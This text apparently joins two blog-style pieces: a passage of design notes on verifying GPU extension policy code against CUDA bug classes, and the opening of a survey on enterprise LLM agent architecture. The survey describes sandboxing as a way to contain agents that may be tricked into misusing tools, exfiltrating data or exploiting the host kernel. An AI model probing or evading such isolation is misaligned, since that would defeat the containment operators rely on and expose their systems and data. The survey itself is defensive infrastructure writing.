Ban blocking primitives in policy code (locks, spin loops, waiting on global conditions). Add a verifier rule: no unbounded loops / no "wait until" patterns. If you absolutely need synchronization, force "single-lane, nonblocking" patterns and bounded retries. Policies must not interact with named barriers (no waits, no signals). This aligns with the availability story: policies must not create device stalls.

Verification scope analysis

Scope & Assurance: Extension-local (E), By-construction. Deadlock patterns (spin-wait, lock contention, named-barrier misuse) are structural properties of policy code; banning blocking primitives makes deadlocks structurally impossible with perfect soundness and high completeness (blocking patterns are rarely needed in policy code).

Production guarantee: The verifier bans: (1) while(condition) loops that could spin indefinitely; (2) lock primitives and mutex-like patterns; (3) named-barrier operations (waits, signals); (4) waiting on global conditions; (5) any construct that could block warp/block execution. If synchronization is needed, force "single-lane, nonblocking" patterns with bounded retries.

Offline/CI tools: ESBMC-GPU models and checks deadlock via bounded model checking; WEFT verifies deadlock freedom, safe barrier recycling, and race freedom for producer-consumer synchronization with named barriers; GKLEE reports finding deadlocks via symbolic exploration. iGUARD notes that lockstep execution can deadlock if threads within a warp use distinct locks.

Residual gap: Policies with legitimate bounded-retry patterns must be structured with explicit iteration counts to prove termination. iGUARD notes that ITS breaks warp-lockstep assumptions: threads in the same warp can now deadlock on locks if they take different branches. Banning blocking primitives is the only sound approach without complex ITS-aware analysis.

16) Kernel Non-Termination / Infinite Loops [Safety, GPU-amplified]

What it is / why it matters

Infinite loops can hang GPU execution. In practice, non-termination is especially dangerous because GPU preemption/recovery can be coarse.

Bug example

__global__ void k(int* flag) {
  while (*flag == 0) { }  // infinite loop if flag never set
  // or: while (true) { /* missing break */ }
}

Seen in / checked by

CL-Vis explicitly calls out infinite loops (together with barrier divergence) as GPU-specific bug types to detect/handle.(Computing and Informatics)

Checking approach

Static bounds analysis: prove loop termination or enforce compile-time bounded loops.
Runtime watchdog: timeout-based detection (coarse but practical).

Verification strategy

This is where "bounded overhead = correctness" is easiest to justify: enforce a strict instruction/iteration bound for policy code (like eBPF on CPU). If policies may contain loops, require compile-time bounded loops only, with conservative upper bounds.

Verification scope analysis

Scope & Assurance: Extension-local (E) for policy; kernel non-termination is out of scope. Static-sound, where bounded loops or instruction budget guarantees policy termination with strong soundness but low completeness (data-dependent loop bounds rejected even if always terminating).

Production guarantee: The eBPF approach works: (1) all loops must have compile-time bounded iteration counts; OR (2) ban loops entirely; OR (3) enforce a total instruction budget. The verifier proves termination by construction without analyzing the kernel. Policies may contain loops only if bounds can be statically determined.

Offline/CI tools: ESBMC-GPU can find non-termination paths within context bounds; CL-Vis explicitly calls out infinite loops (together with barrier divergence) as GPU-specific bug types to detect; runtime watchdogs provide coarse timeout-based detection (engineering stopgap, not completeness).

Residual gap: The verifier guarantees policy termination, not kernel termination. If the kernel itself has infinite loops, the policy verifier cannot and should not try to detect this; that's a kernel bug requiring kernel-level tools. This is "bounded overhead = correctness" at its most justified.

17) Global-Memory Data Races [Correctness, CPU-shared]

What it is / why it matters

Races on global memory are a fundamental correctness issue. Unlike shared memory (block-local), global memory is accessible by all threads across all blocks, making races harder to reason about. Many GPU race detectors historically focused on shared memory and ignored global-memory races.

Bug example

__global__ void k(int* g, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  // Multiple threads may write to same location without sync
  if (tid < n) g[tid % 16] += 1;  // race if multiple threads hit same index
}

Seen in / checked by

ScoRD explicitly argues that many GPU race detectors focus on shared memory and ignore global-memory races.(CSA - IISc Bangalore)
iGUARD targets races in global memory introduced by advanced CUDA features.(Aditya K Kamath)
GKLEE reports global memory races via symbolic exploration.(Lingming Zhang)

Checking approach

Static verification: extend race-freedom proofs to global memory accesses.
Dynamic detection: instrument global memory accesses and track conflicting pairs.

Verification strategy

If policies can write to global memory (maps, counters, logs), require either: (1) warp-uniform single-writer rules, (2) atomic-only helpers, or (3) per-thread/per-warp sharding. Ban unprotected global writes from policies.

Verification scope analysis

Scope & Assurance: Combined → Extension-local (C→E) via state isolation, Static-sound. If policies can write arbitrary kernel global memory, race analysis requires knowing kernel access patterns (Combined). However, restricting policies to write only policy-owned objects reduces this to Extension-local, providing strong soundness with isolation, low completeness for kernel-modifying policies (direct kernel writes require Combined analysis).

Production guarantee: Restricting policies to write only policy-owned objects (maps, ringbuffers) enables Extension-local verification: (1) policy-owned objects use known-safe access patterns (atomics, per-warp sharding); (2) the verifier guarantees race-freedom for policy state without inspecting the kernel; (3) ban unprotected global writes from policies. Three safe patterns: warp-uniform single-writer rules, atomic-only helpers, or per-thread/per-warp sharding.

Offline/CI tools: ScoRD explicitly argues that many GPU race detectors focus on shared memory and ignore global-memory races, and provides detection with scope awareness; iGUARD targets races in global memory introduced by advanced CUDA features via NVBit instrumentation; GKLEE reports global memory races via symbolic exploration. Note: Compute Sanitizer racecheck is primarily a shared-memory hazard detector; do not expect it to fully cover global races.

Residual gap: Policies needing to modify kernel data structures directly cannot be verified locally; this capability should be restricted or require explicit kernel-side contracts. ScoRD/iGUARD emphasize global-memory races are underdetected by existing tools; state isolation sidesteps this entirely for policy code.

18) Memory Safety (Out-of-Bounds / Misaligned / Use-After-Free / Use-After-Scope / Uninitialized) [Safety, CPU-shared]

What it is / why it matters

Classic memory safety includes both spatial (OOB, misaligned) and temporal (UAF, UAS) violations. Temporal bugs exist on GPUs too: pointers can outlive allocations (host frees while kernel still uses, device-side stack frame returns, etc.).

Bug example (OOB)

__global__ void k(float* a, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  a[tid + 1024] = 0.0f;   // OOB write
}

Bug example (Use-After-Scope)

__device__ int* bad() {
  int local[8];
  return local;          // returns pointer to dead stack frame (UAS)
}
__global__ void k() {
  int* p = bad();
  int x = p[0];          // UAS read
}

Seen in / checked by

Compute Sanitizer memcheck precisely detects OOB/misaligned accesses (and can detect memory leaks).(NVIDIA Docs)
Oclgrind reports invalid memory accesses in its simulator.(GitHub)
ESBMC-GPU checks pointer safety and array bounds as part of its model checking.(GitHub)
GKLEE's evaluation includes out-of-bounds global memory accesses as error cases.(Lingming Zhang)
Wu et al.: "unauthorized memory access" appears in root-cause characterization.(arXiv)
cuCatch explicitly targets temporal violations using tagging mechanisms and discusses UAF/UAS detection.(d1qx31qr3h6wln.cloudfront.net)
Guardian: PTX-level instrumentation + interception to fence illegal memory accesses under GPU sharing.(arXiv)

Checking approach

Bounds-check instrumentation (Guardian/cuCatch-style): insert base+bounds checks (or partition-fencing) around loads/stores.(arXiv)
Temporal tagging + runtime checks (cuCatch-style): tag allocations and validate before deref.(d1qx31qr3h6wln.cloudfront.net)
Static verification (ESBMC-GPU): model checking for pointer safety and array bounds.(GitHub)
PTX-level instrumentation (Guardian-style): insert bounds checks and interception to fence illegal accesses.(arXiv)
Tagging mechanisms (cuCatch-style): track allocation ownership and validate access rights.(d1qx31qr3h6wln.cloudfront.net)

Verification strategy

This is the "classic verifier" portion: keep eBPF-like pointer tracking, bounds checks, and restricted helpers. Easiest for policies is to ban arbitrary pointer dereferences and force all memory access through safe helpers (maps/ringbuffers). Ideally: policies cannot allocate/free; all policy-visible objects are managed by the extension runtime and remain valid across policy execution (no UAF/UAS by construction). Also add a testing story: run policy-enabled kernels under Compute Sanitizer memcheck in CI for regression.

Verification scope analysis

Scope & Assurance: Extension-local (E) for policy memory. Static-sound for spatial safety (helper-only access with tracked bounds); By-construction for temporal safety (runtime-managed objects, no policy malloc/free). Strong soundness with low completeness (raw pointer arithmetic rejected).

Production guarantee: The eBPF approach: (1) ban arbitrary pointer dereferencing; (2) all memory access through verified helpers (map lookup, ringbuffer write); (3) verifier tracks pointer provenance and bounds; (4) policy-visible objects are runtime-managed (no policy malloc/free): UAF/UAS impossible by construction because objects remain valid for the policy's lifetime. This provides strong memory safety for policy code without analyzing the kernel.

Offline/CI tools: Compute Sanitizer memcheck precisely detects OOB/misaligned accesses and memory leaks; cuCatch explicitly targets temporal violations using tagged base&bounds mechanisms and discusses UAF/UAS detection (some deterministic, some probabilistic); ESBMC-GPU checks pointer safety and array bounds via bounded model checking; GKLEE's evaluation includes out-of-bounds global memory accesses as error cases; Wu et al. characterize "unauthorized memory access" in their root-cause analysis; Guardian provides PTX-level instrumentation + interception for multi-tenant memory isolation.

Residual gap: Policy memory safety doesn't protect against kernel bugs. For multi-tenant fault isolation in spatial sharing (streams/MPS), Guardian-style PTX instrumentation or hardware isolation is needed to prevent one tenant's OOB from crashing others: policy verification alone is insufficient for system-wide isolation.

Multi-tenant implications

In spatial sharing (streams/MPS), kernels share a GPU address space. An OOB access by one application can crash other co-running applications (fault isolation issue). Guardian's motivation explicitly calls out this problem and designs PTX-level fencing + interception as a fix.(arXiv) This directly supports the "availability is correctness" story: if policies run in privileged/shared contexts, you must prevent policy code from generating OOB accesses. Either: (a) only allow map helpers (no raw memory), or (b) instrument policy memory ops with bounds checks (Guardian-style PTX rewriting).

Bug example (multi-tenant OOB, conceptual)

// Tenant A kernel writes OOB and corrupts Tenant B memory in same context.

Bug example (Uninitialized Memory)

__global__ void k(float* out, float* in, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  // 'in' was cudaMalloc'd but never initialized or memset
  out[tid] = in[tid] * 2.0f;  // reading uninitialized memory
}

Uninitialized Memory: additional notes

Accessing device global memory without initialization leads to nondeterministic behavior. This is a frequent source of heisenbugs because GPU concurrency amplifies nondeterminism. Compute Sanitizer initcheck reports cases where device global memory is accessed without being initialized.(NVIDIA Docs) For policies, require explicit initialization semantics (e.g., map lookup returns "not found" unless initialized; forbid reading uninitialized slots).

19) Arithmetic Errors (overflow, division by zero) [Correctness/Safety, CPU-shared]

What it is / why it matters

Arithmetic errors can corrupt keys/indices and cascade into memory safety/perf disasters.

Bug example

__global__ void k(int* out, int* in, int divisor) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  out[tid] = in[tid] / divisor;  // div-by-zero if divisor == 0

  int idx = tid * 1000000;       // overflow for large tid
  out[idx] = 1;                  // corrupted index => OOB
}

Seen in / checked by

ESBMC-GPU explicitly lists arithmetic overflow and division-by-zero among the properties it checks for CUDA programs (alongside races/deadlocks/bounds).(GitHub)

Checking approach

Model checking (ESBMC-GPU): static verification of arithmetic properties.
Lightweight runtime checks: guard div/mod operations.

Verification strategy

Optional but reviewer-friendly: add lightweight verifier checks for div-by-zero and dangerous shifts, and constrain pointer arithmetic (already typical in eBPF verifiers). For "perf correctness," overflow in index computations is a common hidden cause of random/uncoalesced patterns.

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Arithmetic errors depend only on the policy's operations and input value ranges, providing strong soundness via range analysis with medium completeness (complex arithmetic may require explicit assertions).

Production guarantee: The verifier performs lightweight static checks: (1) division: require static proof that divisor ≠ 0, or insert runtime guards; (2) overflow: use saturating arithmetic, or prove bounds on operands; (3) dangerous shifts: validate shift amounts; (4) index arithmetic: track value ranges to catch OOB before memory access. This is already typical in eBPF verifiers and adds minimal overhead to policy verification.

Offline/CI tools: ESBMC-GPU explicitly lists arithmetic overflow and division-by-zero among the properties it checks for CUDA programs (alongside races/deadlocks/bounds) via bounded model checking.

Residual gap: Policies with complex arithmetic that happens to be safe may need explicit assertions or be conservatively rejected. Cascade risk: arithmetic errors often cascade into memory safety bugs (corrupted indices → OOB) or performance bugs (overflow in index computations causing random/uncoalesced patterns). The verifier should track value ranges through index computations proactively to catch these before they become downstream violations.

Summary: Improper Synchronization as a Root-Cause Category (Wu et al.'s Three-Way Taxonomy)

Wu et al.'s empirical study explicitly groups CUDA-specific synchronization issues into three concrete bug types: data race, barrier divergence, and redundant barrier functions. They also highlight that these often manifest as inferior performance and flaky tests. Simulee is used to find these categories in real projects.(arXiv)

This is exactly the "verification story" hook: a GPU extension verifier can claim that policy code cannot introduce these synchronization root causes because:

barriers are only allowed at provably uniform control flow points,
warp-uniform side effects enforced,
bounded helper calls,
and a restricted memory model for policies.

Summary: Verification Scope and Assurance Types

The verification scope and assurance type dimensions reveal crucial insights for GPU extension framework design.

By Verification Scope

Extension-local (E): 14 of 19 classes:
Bugs #1, #2, #4, #6, #7, #10, #11, #12, #15, #16, #18, #19 can be eliminated purely by restricting policy code, without inspecting the host kernel. Additionally, bugs #3, #5, #14, #17 can be reduced from Combined to Extension-local through state isolation.

Combined (C): 2 classes requiring contracts:
Bugs #8 (block-size dependence) and #9 (launch config assumptions) fundamentally depend on kernel launch parameters. These require contract-based validation at attach time.

Host+Device (H): 1 class requiring host-side tools:
Bug #13 (host↔device async races) cannot be addressed by device-side verification. Requires CuSan/TSan and careful API design.

By Assurance Type

Assurance Type	Bug Classes	Soundness	Completeness
By-construction	#2, #10, #15	Perfect	High
Static-sound	#1, #3, #4, #5, #6, #11, #14, #16, #17, #18, #19	Strong	Low-Medium
Static-heuristic	#7, #12	Good	Medium
Contract-based	#8, #9	Conditional	Depends on contracts
Dynamic-only	#13	Executed paths only	Coverage-dependent

The Three-Stage Verification Pipeline

Stage 1: Load-time static verifier (core, analogous to eBPF verifier)

The load-time verifier employs three tiers of analysis, ranging from outright bans on genuinely dangerous constructs to static analysis that preserves useful functionality:

Tier A — By-construction bans (3 classes, no legitimate policy use):

Ban warp sync primitives (#2) — mask correctness is unverifiable without ITS-aware analysis
Ban spin-wait / polling loops (#10) — causes stale reads and ad-hoc synchronization
Ban blocking primitives: locks, mutexes, named barriers (#15) — prevents non-barrier deadlocks

Tier B — Static-sound analysis (11 classes, allow but verify safe usage):

Verification capability	Bug classes covered	What it does
Uniform control-flow analysis	#1 barrier divergence, #4 warp-divergence race, #6 control-flow divergence	Prove barriers are at uniform points; side-effects on uniform paths
Memory access pattern analysis	#5 uncoalesced access, #7 bank conflicts	Check stride patterns; reject non-conforming index expressions
Race-freedom structural rules	#11 shared-mem races, #17 global-mem races	Per-lane sharding / lane0-only / atomic helpers + state isolation
Scope enforcement	#3 atomic scope	Force device-scope for policy atomics + state isolation
Pointer/memory safety	#18 memory safety	Restrict pointer operations, analogous to eBPF pointer verification
Loop termination	#16 non-termination	Enforce bounded iteration counts
Range analysis	#19 arithmetic errors	Track value ranges to prevent overflow cascading into OOB
Resource budgets	#14 atomic contention	Limit atomic counts / enforce warp-aggregation

Tier C — Static-heuristic detection (2 classes, performance warnings/rejections):

#7 bank conflicts → check shared-memory index stride against bank mapping
#12 redundant barriers → dependence analysis to determine if a barrier protects actual cross-thread dependencies

Stage 2: Attach-time contract validation (2 classes)

#8 block-size dependence → policy declares preconditions (e.g., requires: blockDim.x >= 128), validated when attaching to a specific kernel
#9 launch config assumptions → validate grid/block dimensions satisfy policy preconditions

Stage 3: CI/Offline + Runtime (complementary coverage)

#13 host↔device async races → CuSan/TSan dynamic detection, beyond device-side verification scope
GPUVerify/ESBMC-GPU for kernel+extension combined analysis (when source is available)
Compute Sanitizer suite for dynamic regression testing
iGUARD/Simulee for advanced race detection
Runtime overhead enforcement for multi-tenant isolation (Guardian-style)

The eBPF Lesson Applied to GPUs

Just as eBPF succeeds by restricting extension capabilities to what can be verified without inspecting the kernel, a GPU extension verifier should:

Ban only what is genuinely dangerous and unnecessary — warp sync, spin-wait, and blocking primitives have no legitimate use in policy code
Use static analysis to allow useful features safely — barriers, shared memory, and atomics are valuable; verify their safe usage rather than banning them
Isolate policy state to reduce Combined bugs to Extension-local
Enforce warp-uniformity for side effects, bounding SIMT-amplified overhead
Use budgets for performance-affecting resources (atomics, memory ops)
Require contracts only for unavoidably Combined properties (#8, #9)

The key design principle is not to ban everything that could go wrong, but to apply the right level of restriction for each risk: outright bans for constructs with no legitimate policy use, static verification for useful but dangerous features, and heuristic detection for performance concerns. This preserves policy expressiveness while maintaining soundness for safety-critical GPU extensions.

Architectures for Agent Systems: A Survey of Isolation, Integration, and Governance

云微 — Tue, 03 Feb 2026 07:36:18 +0000

Large Language Model (LLM) based agent systems – software that leverages LLMs to autonomously plan and execute multi-step tasks using external tools – are rapidly moving from proof-of-concept demos into enterprise deployment. These agents promise to automate coding, IT operations, data analysis, and more, but deploying them in production raises new challenges in security, reliability, and integration. Over the last half-year, the community has converged on key strategies: strong isolation for executing untrusted actions, standardized protocols for tool integration, and governance frameworks to align agent behavior with enterprise policies. This survey provides a systematic review of recent developments (roughly the latter half of 2025), including agent sandbox architectures, emerging standards like MCP, open-source projects, industry initiatives, and research advances. We focus on the pain points encountered when bringing agent systems to production and how the latest solutions address (or still fall short on) those needs.

1. Agent System Architecture in the Enterprise

An enterprise-ready agent system typically consists of several layers: (i) an LLM-based reasoning core (the "agent" that decides which actions to take), (ii) an interface to invoke external tools or services (e.g. via APIs, command-line, databases), and (iii) an execution environment or runtime where the agent's tool actions (like running code or shell commands) actually occur. Surrounding these are components for memory/state storage, orchestration (especially if multiple agents work together), and monitoring & control (for safety and compliance). The overarching architectural challenge is that these systems are highly dynamic and open-ended: the agent may generate arbitrary code or tool requests at runtime, often based on unpredictable input. This requires a different approach to software architecture than traditional deterministic services.

Isolation and Safety by Design. Unlike a bounded microservice, an AI agent might decide to execute unvetted code or make system-altering calls. A core architectural principle emerging in 2025 is to sandbox the agent's actions – running them in an isolated environment that protects the host system and network. For example, the open-source Agent Sandbox for Kubernetes was introduced as a new Kubernetes primitive to run AI agents safely. Instead of letting LLM-generated code run in a standard container (which could still abuse the host kernel or other pods), Agent Sandbox uses lightweight VMs (gVisor-based userland kernel, with optional Kata Containers support) to create a secure barrier between the agent's code and the cluster node's OS. This isolates potentially malicious or errant code from interfering with other applications or the host. The Sandbox is managed via a custom Kubernetes resource (CRD) called Sandbox, which represents a single, stateful, long-lived pod with a stable identity and persistent storage. This design reflects a shift from treating agent workloads as ephemeral stateless functions to treating them as session-oriented services that may hold state over time. Indeed, the Agent Sandbox supports features like pausing and resuming the VM, automatically reviving it if a network reconnect is needed, and even memory sharing across sandboxes for efficiency. It also provides a templating and pool mechanism – SandboxTemplate and SandboxClaim – to manage pools of pre-warmed sandbox pods. Pre-warming is crucial because launching a fresh isolated VM can be slow; by keeping a pool of ready-to-go sandboxes, startup latency for a new agent session is dramatically reduced (Google reports sub-second startup latency, a ~90% improvement over cold-starting sandboxes). In Google's GKE, this is paired with a new Pod Snapshots feature that can checkpoint and restore running sandbox pods (even GPU workloads), cutting startup from minutes to seconds and avoiding idle resource waste. In short, the sandbox architecture is purpose-built for autonomous agents: it provides stronger isolation than ordinary containers, yet supports persistent state and fast elasticity to accommodate long-running, interactive agent tasks at scale.

Stateful Singleton Runtimes. Traditional cloud apps often scale by running many stateless instances behind a load balancer, but agent use-cases (like an AI coding assistant or an autonomous scheduler) often manifest as a single specialized "worker" with memory (such as cached tools or context) that persists across many tool calls. The Kubernetes Agent Sandbox explicitly targets these singleton, stateful workloads – not just for AI agents but also things like CI/CD build agents or single-node databases that require stable identity and disk state. This reflects a broader industry recognition: agent applications need new runtime primitives that can maintain continuity of state and identity across a session (for example, so the agent can incrementally build on previous tool outputs, or maintain an authenticated session to a service). Recent designs propose durable execution for agents – the ability to pause an agent's process, snapshot its memory or file system, and later resume or even migrate it. The GKE Agent Sandbox + Pod Snapshot combo is an early real-world example of this, effectively treating an agent's environment as a checkpointable virtual machine. We anticipate emerging orchestration support where an agent can be hibernated when idle and quickly reawakened when needed, balancing responsiveness with efficient resource use.

Tool Interface Layer. The other critical piece of architecture is how agents interface with external tools and data. Historically, each AI assistant platform invented its own plugin system or API schema (e.g. OpenAI's Plugins, LangChain's tool abstractions). This led to a fragmented ecosystem where tools had to be rewritten for each agent framework. Over 2025, a consensus has grown around Model Context Protocol (MCP) as a standard interface between AI models (the clients) and tools or services (the servers). MCP was released by Anthropic in late 2024 and by 2025 it has become "the universal standard protocol for connecting AI models to tools, data, and applications". Conceptually, MCP defines a simple JSON-RPC-based client-server protocol by which an AI agent can discover available tools and invoke them with arguments, and receive results/observations. The tools can be anything: database queries, file system operations, web requests, code compilation – each exposed by an MCP server that the agent connects to. The power of a common protocol is that it transforms the integration problem from M×N (every model integrating with every tool) to M+N modularity. A tool developer can create an MCP server once, and any compliant agent (whether it's OpenAI's, Anthropic's, or an open-source project) can use it. This dramatically reduces duplicated effort and makes the system more maintainable. GitHub engineers describe MCP as creating a "USB-C for AI" – a universal port for tools. In practice, MCP connections can be local (via stdio pipes) or remote (HTTP+SSE streams), and are typically stateful sessions, which aligns well with the idea of agent tools that maintain context (e.g. a database connection that stays open, or a browser that retains cookies).

Orchestration and Multi-Agent Workflows. Many real tasks may be too complex for a single agent or might benefit from specialized agents collaborating. The architecture is therefore expanding to support multi-agent systems where agents communicate or coordinate. Some protocols, like Agent-to-Agent (A2A) messaging, are emerging to standardize inter-agent communication (for instance, Google's Agent2Agent protocol and Microsoft's adoption of A2A in their framework). In a multi-agent setup, you might have one agent that specializes in planning, another in executing code, another in validation, etc., passing context or subtasks among them. Orchestration frameworks now often support deterministic workflows (where the chain of sub-tasks is predefined, akin to a business process) alongside LLM-driven orchestration (where agents dynamically decide how to break down and assign tasks). For example, Microsoft's new open-source Agent Framework explicitly supports both Agent Orchestration (LLM-driven, creative, adaptive) and Workflow Orchestration (fixed logic, for reliable repeatability) within one runtime. This framework, released in late 2025, consolidates previous research prototypes (like Semantic Kernel's planner and AutoGen from MSR) into an enterprise-ready SDK. It emphasizes connectors to enterprise systems, open standards (MCP, A2A, OpenAPI), and built-in telemetry, approvals, and long-running durability to meet enterprise needs. The trend here is that agents are being treated as first-class components of software systems, with the same expectations for monitoring, security, and lifecycle management as microservices or human-in-the-loop workflows.

Summary: The architecture of modern agent systems is coalescing around a modular, layered design. A secure sandboxed execution layer ensures that any generated code or commands run in isolation with controlled privileges. A standardized tool interface layer (MCP and similar protocols) decouples agent reasoning from the implementation of tools, enabling a rich ecosystem of reusable capabilities. On top of these, orchestration mechanisms allow composing multiple agents and tools into larger autonomous workflows, while providing hooks for humans and existing DevOps processes to supervise and intervene when needed. In the following sections, we delve deeper into three crucial aspects of enterprise agent systems: (a) the sandbox and runtime isolation mechanisms, (b) the emerging standards and ecosystems of tools/plugins, and (c) the security, governance, and observability considerations that are top-of-mind as organizations deploy these systems.

2. Isolated Execution Environments for Agents (Sandboxing)

Running untrusted or machine-generated code has always been risky – the difference now is that with LLM agents the code is being generated and executed on the fly, without a human vetting each command. This opens the door to accidental failures or even malicious exploits if the agent is tricked or if its outputs are unsafe. As a result, sandboxing has become a foundational requirement for agent systems. Sandboxing in this context means confining the agent's actions (code execution, file system writes, network calls, etc.) to an environment where it can't harm other processes or breach data it shouldn't access.

Table 1: Research / OSS Projects (Papers, Benchmarks, Open-Source Runtimes)

Name	Category	Sandbox/Isolation Boundary	Key Capabilities	Reference
Kubernetes SIGs: agent-sandbox	OSS (K8s Primitives/Controller)	Sandbox CRD in Kubernetes (with Template/Claim/WarmPool)	Manage "isolated + stateful + singleton" workloads; standardized API for agent runtime	GitHub
AIO Sandbox (agent-infra/sandbox)	OSS (All-in-One Environment)	Single Docker container (integrated multi-tools)	Browser/Shell/File/MCP/VSCode Server unified; unified workspace for agents & dev	GitHub
Alibaba OpenSandbox	OSS (Universal Sandbox Platform)	Unified protocol + multi-language SDK + sandbox runtime	Universal sandbox foundation for command/file/code/browser/agent execution	GitHub
E2B (e2b-dev/E2B)	OSS (Cloud Sandbox Infrastructure)	Cloud-isolated sandbox (SDK controlled)	Run AI-generated code in cloud; Python/JS SDK; for agent code interpreter	GitHub
E2B Desktop (e2b-dev/desktop)	OSS (Virtual Desktop Sandbox)	Isolated virtual desktop environment	"Computer Use" agent: desktop GUI, customizable dependencies, per-sandbox isolation	GitHub
LLM Sandbox (vndee/llm-sandbox)	OSS (Lightweight Code Sandbox)	Containerized isolation (configurable security policies)	Run LLM-generated code; customizable security policies and isolated container environments	GitHub
SkyPilot Code Sandbox (alex000kim/…)	OSS (Self-hosted Execution Service)	SkyPilot deployment + Docker sandboxing	Self-hosted, multi-language execution, token auth, MCP integration (for agent tools)	GitHub
Microsandbox (zerocore-ai/microsandbox)	OSS (microVM Execution Environment)	Hardware-isolated microVM (fast startup)	Run untrusted workloads via microVM; emphasis on isolation strength and startup speed	GitHub
ERA (BinSquare/ERA)	OSS (Local microVM Sandbox)	Local microVM ("microVM with container ease-of-use")	Run untrusted/AI-generated code locally with hardware-level isolation	GitHub
SandboxAI (substratusai/sandboxai)	OSS (Runtime)	Isolated sandbox	Secure execution runtime for AI-generated Python code and shell commands	GitHub
Python MCP Sandbox (JohanLi233/mcp-sandbox)	OSS (MCP Server)	Docker container isolation	Expose "secure Python execution" as a tool to agent/LLM clients via MCP	GitHub
Code Sandbox MCP (Automata-Labs-team/…)	OSS (MCP Server)	Docker container isolation	MCP server: provide containerized secure code execution environment for AI applications	GitHub
ToolSandbox (Apple)	Research + OSS (Evaluation Benchmark)	Evaluation sandbox with "stateful tool execution + user simulator"	Evaluate LLM tool-use: state dependencies, multi-turn dialogue, dynamic evaluation; open-source	arXiv
ToolEmu	Research (Risk Evaluation Framework)	LM-emulated sandbox (simulate tool execution with LM)	Use LM to simulate tool execution for scalable agent risk testing; includes automatic safety evaluator	OpenReview
HAICOSYSTEM	Research + OSS (Safety Evaluation Ecosystem)	Modular interaction sandbox (human-agent-tool multi-turn simulation)	Multi-domain scenario simulation and multi-dimensional risk evaluation (operational/content/social/legal); code platform	arXiv
EnterpriseBench	Research (Enterprise Environment Evaluation Sandbox)	"Evaluation environment" for enterprise tasks/tools/data	Evaluate LLM agents in enterprise scenarios (task execution, tool dependencies, data retrieval)
Managing Linux servers with LLM-based AI agents	Research (Empirical Evaluation)	Dockerized Linux sandbox	Let agents execute server tasks in Dockerized Linux environment and evaluate performance	ScienceDirect
Multi-Programming Language Sandbox for LLMs	Research (Multi-language Execution Sandbox)	Container-isolated sub-sandbox	Multi-language compilation/execution isolation (sub-sandbox isolated from main environment)	arXiv
awesome-sandbox (restyler/awesome-sandbox)	OSS (Ecosystem Overview/List)	N/A (aggregation)	Systematic curated list & analysis of "code sandboxing solutions"; good entry point for long-tail coverage	GitHub

Note: Achieving exhaustive coverage is impractical (especially given the long tail of the MCP ecosystem), so this table covers mainstream/representative projects plus ecosystem indexes. The awesome-sandbox list serves as an entry point for additional coverage.

Table 2: Commercial / Cloud Service Projects (Agent Sandbox / Code Sandbox / Runtime)

Product/Service	Vendor	Isolation/Execution Model	Key Capabilities	Reference
Code Interpreter (Tools)	OpenAI	Managed Python sandbox execution	Model writes and runs Python; for data analysis/coding/math	OpenAI Platform
Code Interpreter (Assistants on Azure)	Microsoft Azure OpenAI	Managed Python sandbox execution	Assistants API runs Python in sandbox environment (per Azure docs)	Microsoft Learn
E2B (Managed Cloud)	E2B	Managed cloud sandbox (enterprise agent cloud)	Sandbox as agent runtime; emphasis on concurrency and execution infrastructure	E2B
Daytona	Daytona	Managed/platform sandbox infrastructure	"Stateful infra for AI agents"; ultra-fast creation and isolated execution	Daytona
Agent Sandbox	Novita AI	Managed agent runtime	Low startup latency, high concurrency; code execution/network access/browser automation	Novita AI
Sandboxes (Desktop / GUI)	Bunnyshell	Firecracker microVM virtual desktop	For GUI/Computer Use: isolated desktop, VNC/noVNC, desktop automation API	Bunnyshell
Agent Sandbox on GKE	Google Cloud (GKE)	Deploy/run Agent Sandbox controller on GKE	Isolated execution of untrusted commands in cluster; official installation and usage guide	Google Cloud Documentation
AgentCore "agent sandbox"	AWS Bedrock AgentCore	Console testing sandbox	AWS docs: test agents in agent sandbox	AWS Documentation
Modal Sandboxes	Modal	Modal platform sandbox execution unit	Official example: build code-executing agent with Modal Sandboxes + LangGraph	Modal
Vercel Sandbox	Vercel	Vercel managed execution environment (Sandbox product)	For scalable execution (fluid compute/pay-per-active-CPU, etc.)	Vercel
Docker Sandboxes (Experimental)	Docker	Local containerized sandbox (for coding agents)	Docker official: use local isolated environments to run coding agents, enforce boundaries	Docker

Agent Sandbox on Kubernetes. The Kubernetes-based Agent Sandbox, spearheaded by Google and open-sourced as a SIG project in late 2025, exemplifies state-of-the-art sandbox design. A sandbox instance is essentially a microVM (micro virtual machine) launched per agent session, managed through K8s APIs. Internally it leverages technologies like gVisor (userspace kernel) to intercept syscalls and Kata Containers (lightweight VM isolation) to provide a robust security boundary. This means even if an agent's code tries to perform a malicious syscall or exploit a kernel bug, it's constrained within a sandbox kernel that has minimal privileges on the host. The sandbox also limits network access by default on GKE (only allowing what's necessary for the agent tools), reducing the risk of an agent scanning internal networks or exfiltrating data. At KubeCon NA 2025, Google showcased how they can schedule thousands of sandbox pods in parallel, thanks to the lightweight nature of gVisor, and how pre-warmed sandbox pools enable sub-second startup latencies even with the isolation. This addresses the performance concern that isolation often introduces: by carefully engineering snapshot/restore and pooling, the overhead can be kept low enough for interactive use.

From an API standpoint, the Sandbox CRD provides features tailored to long-running agent processes: you can specify resource limits, attach persistent volumes for agent state, and use the Kubernetes scheduler to place sandboxes on appropriate nodes (e.g. ones with GPU if the agent needs it). It also has life-cycle controls like scheduled deletion (to clean up sandboxes after use) and the mentioned pause/resume. Collectively, these features fulfill OWASP's top recommendation for mitigating agent risks: "system isolation, access segregation, permission management, command validation, and other safeguards". In fact, OWASP added an entry to its Top 10 for LLMs called "Agent Tool Interaction Manipulation" – the risk of an AI agent being induced to misuse its tools or perform unintended actions. The primary defense listed is to run the agent in a locked-down environment with fine-grained permission controls on what it can do. By confining an agent to a Kubernetes sandbox with only specific Kubernetes API access (or none at all beyond its tools) and no broad host access, even a compromised agent will have limited blast radius.

